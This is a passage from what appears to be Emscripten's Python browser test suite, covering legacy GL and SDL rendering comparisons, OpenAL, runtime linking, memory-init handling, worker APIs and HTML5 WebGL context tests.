    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
  '': ([],),
  'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
  # proxy only in the simple, normal case (we can't trace GL calls when
  # proxied)
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)

@requires_graphics_hardware
def test_cubegeom_regal(self):
  # cubegeom through Regal rather than LEGACY_GL_EMULATION; also proxied.
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)

@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
  # Regal build with pthreads enabled; not proxied.
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)

@requires_graphics_hardware
def test_cubegeom_proc(self):
  # A side file defines a global named like the GL function to check that the
  # name collision does not break SDL_GL_GetProcAddress resolution.
  create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
  # also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
  for opts in [[], ['-O1'], ['-Os']]:
    self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
# --- cubegeom rendering variants: each renders a frame and compares it to a
# reference image under LEGACY_GL_EMULATION unless noted otherwise. ---

@requires_graphics_hardware
def test_cubegeom_glew(self):
  # cubegeom through GLEW, with closure applied on top of the GL emulation.
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_color(self):
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_normal(self):
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)

@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)

@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do not start from 0
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_mt(self):
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture

@requires_graphics_hardware
def test_cubegeom_color2(self):
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)

@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_fog(self):
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
  # Vertex-array-object variants of the cubegeom_pre scene.
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
  # VAO variant compiled against FULL_ES2 rather than the legacy emulation.
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
  self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_cube_explosion(self):
  self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)

@requires_graphics_hardware
def test_glgettexenv(self):
  self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
# --- SDL 2D canvas rendering tests; each compares the canvas against a
# reference image. ---

def test_sdl_canvas_blank(self):
  self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')

def test_sdl_canvas_palette(self):
  self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')

def test_sdl_canvas_twice(self):
  self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')

def test_sdl_set_clip_rect(self):
  self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')

def test_sdl_maprgba(self):
  # reference_slack tolerates small per-pixel differences in the comparison.
  self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)

def test_sdl_create_rgb_surface_from(self):
  self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')

def test_sdl_rotozoom(self):
  # Needs a real image preloaded; use the shared screenshot.png fixture.
  shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
  self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)

def test_sdl_gfx_primitives(self):
  self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
  # Render sdl_canvas_palette_2.c once per color channel and compare each run
  # against the matching reference image. Channel selection happens through
  # Module['arguments'], set up by a per-channel pre-js file.
  create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
  # Write all three argument files first, then run the three builds, matching
  # the original create-then-test ordering.
  for channel in ('r', 'g', 'b'):
    create_test_file('args-%s.js' % channel, '''
Module['arguments'] = ['-%s'];
''' % channel)
  for channel in ('r', 'g', 'b'):
    self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_%s.png' % channel, args=['--pre-js', 'pre.js', '--pre-js', 'args-%s.js' % channel, '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
  self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])

def test_sdl_alloctext(self):
  self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])

def test_sdl_surface_refcount(self):
  self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')

def test_sdl_free_screen(self):
  self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')

@requires_graphics_hardware
def test_glbegin_points(self):
  shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
  self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])

@requires_graphics_hardware
def test_s3tc(self):
  # S3TC/DXT compressed-texture upload from a preloaded .dds file.
  shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
  self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_s3tc_ffp_only(self):
  # Same as test_s3tc but with the fixed-function-only GL_FFP_ONLY path.
  shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
  self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])

@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
  # Anisotropic filtering; allows slack of 2 in the image comparison.
  shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
  self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])

@requires_graphics_hardware
def test_tex_nonbyte(self):
  self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_float_tex(self):
  self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])

@requires_graphics_hardware
def test_subdata(self):
  # glBufferSubData path; renders the same image as test_float_tex.
  self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])

@requires_graphics_hardware
def test_perspective(self):
  self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])

@requires_graphics_hardware
def test_glerror(self):
  self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
  # Build openal_error.c under three linking configurations -- implicit
  # linking, explicit -lopenal with STRICT, and a closure build -- and expect
  # the same result from each.
  variants = (
    [],
    ['-lopenal', '-s', 'STRICT'],
    ['--closure', '1'],
  )
  for opts in variants:
    print(opts)
    self.btest('openal_error.c', expected='1', args=opts)
def test_openal_capture_sanity(self):
  # Minimal sanity check for the OpenAL capture entry points.
  self.btest('openal_capture_sanity.c', expected='0')

def test_runtimelink(self):
  # Runtime linking between a MAIN_MODULE and a SIDE_MODULE that call into
  # each other and read each other's globals through a shared header.
  create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
  create_test_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
  create_test_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
  self.compile_btest(['supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
  # main exits with suppInt (76), proving the side module's global was read.
  self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.wasm"]', '-s', 'EXPORT_ALL'], expected='76')
def test_pre_run_deps(self):
  # Adding a dependency in preRun will delay run
  create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
  # Run with and without a memory init file; the reported value (10) is only
  # set once the delayed dependency is removed.
  for mem in [0, 1]:
    self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])

@no_wasm_backend('mem init file')
def test_mem_init(self):
  # Checks that JS writes to HEAP before the memory init file arrives are
  # detected (with assertions) or overwritten (without).
  create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
  create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
  # with assertions, we notice when memory was written to too early
  self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
  # otherwise, we just overwrite
  self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
  # Point Module.memoryInitializerRequest at a URL (valid, then bogus) and
  # check that startup either succeeds or surfaces the failure warning.
  def test(what, status):
    print(what, status)
    # NOTE: the trailing `''' % self.port` applies only to the last string
    # segment (Python's % binds tighter than +), which contains the lone %s.
    create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
    self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
  test('test.html.mem', '1')
  test('nothing.nowhere', '0')
def test_runtime_misuse(self):
  # Calling into compiled code before the runtime is ready (or after it has
  # exited) must abort; calling while the runtime is alive must work. Three
  # call styles are exercised: ccall, cwrap, and a direct Module._fn call.
  post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
  post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
  post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
  create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
  # Each testcase is run both as wasm and as WASM=0 (JS), and in three
  # timings: too early (async mem init), too late (after exit), and while the
  # runtime is alive.
  for filename, extra_args, second_code in [
    ('runtime_misuse.cpp', [], 600),
    ('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
  ]:
    for mode in [[], ['-s', 'WASM=0']]:
      print('\n', filename, extra_args, mode)
      print('mem init, so async, call too early')
      create_test_file('post.js', post_prep + post_test + post_hook)
      self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
      print('sync startup, call too late')
      create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
      self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
      print('sync, runtime still alive, so all good')
      create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
      self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
  # cwrap must be usable from a pre-js, before the runtime is fully up.
  self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')

def test_worker_api(self):
  # Build a worker with BUILD_AS_WORKER, then drive it from a main program.
  self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
  self.btest('worker_api_main.cpp', expected='566')

def test_worker_api_2(self):
  # Worker with several exported entry points, optimized and closure-built.
  self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
  self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')

def test_worker_api_3(self):
  self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
  self.btest('worker_api_3_main.cpp', expected='5')

def test_worker_api_sleep(self):
  # Worker variant that sleeps, so it needs the async (ASYNCIFY-style) args.
  self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
  self.btest('worker_api_main.cpp', expected='566')

def test_emscripten_async_wget2(self):
  self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])

def test_module(self):
  # Runtime dynamic linking: build a side module, then a main module that
  # calls its exports.
  self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=[_one,_two]'])
  self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
def test_preload_module(self):
  # Preload a side module via --preload-file and verify it shows up in
  # Module['preloadedWasm'], so dlopen can use it without a network fetch.
  create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
  self.compile_btest(['library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
  # Rename to .so so the preload plugin treats it as a shared library.
  os.rename('library.wasm', 'library.so')
  create_test_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
  self.btest_exit(
    'main.c',
    args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'],
    expected='0')
def test_mmap_file(self):
  # mmap over a preloaded file; payload is padded to ~9KB so it spans more
  # than one page.
  create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
  self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])

# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
  self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
  # Run with ./runner.py browser.test_uuid
  # We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
  # high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
  # First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
  # require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
  self.run_process([EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
  test_js_closure = open('test.js').read()
  # Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
  assert ").randomBytes" in test_js_closure
  assert "window.crypto.getRandomValues" in test_js_closure
  out = self.run_js('test.js')
  print(out)
  # Tidy up files that might have been created by this test.
  try_delete(path_from_root('tests', 'uuid', 'test.js'))
  try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
  # Now run test in browser
  self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])

@requires_graphics_hardware
def test_glew(self):
  # GLEW init under four configurations: plain, legacy GL emulation, GLEW_MX,
  # and both combined.
  self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
  self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
  self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
  self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
  # Regression test: adding and immediately removing a run dependency in
  # preRun must not cause the runtime to start twice.
  create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
  self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')

@parameterized({
  '': ([],),
  'closure': (['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
  'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
  'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
  # Core HTML5 event API coverage under several build configurations.
  self.btest(path_from_root('tests', 'test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
  # HTML5 Gamepad API coverage in a default build, an optimized closure
  # build, and a build that proxies main() to a pthread.
  for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
    print(opts)
    # Previously written as `args=[] + opts`; the empty-list concatenation is
    # a no-op, so pass opts directly.
    self.btest(path_from_root('tests', 'test_gamepad.c'), args=opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
  # Context creation with antialiasing disabled (the AA-enabled variant below
  # is unreliable on software renderers, so this one stays on CI).
  for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
    print(opts)
    self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')

# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
  for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
    print(opts)
    self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')

@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
  self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), expected='0')

@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
  self.btest(path_from_root('tests', 'browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
  # Create and destroy WebGL contexts under several build modes, using a
  # custom shell file.
  for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
    print(opts)
    # Consistency fix: pass the shell-file path components to path_from_root
    # separately, as every other call in this file does, instead of embedding
    # a '/' inside a single component.
    self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests', 'webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
  # glReadPixels against the color buffer; skipped on Windows due to the
  # Firefox WebGL bug linked in the skip message.
  if WINDOWS:
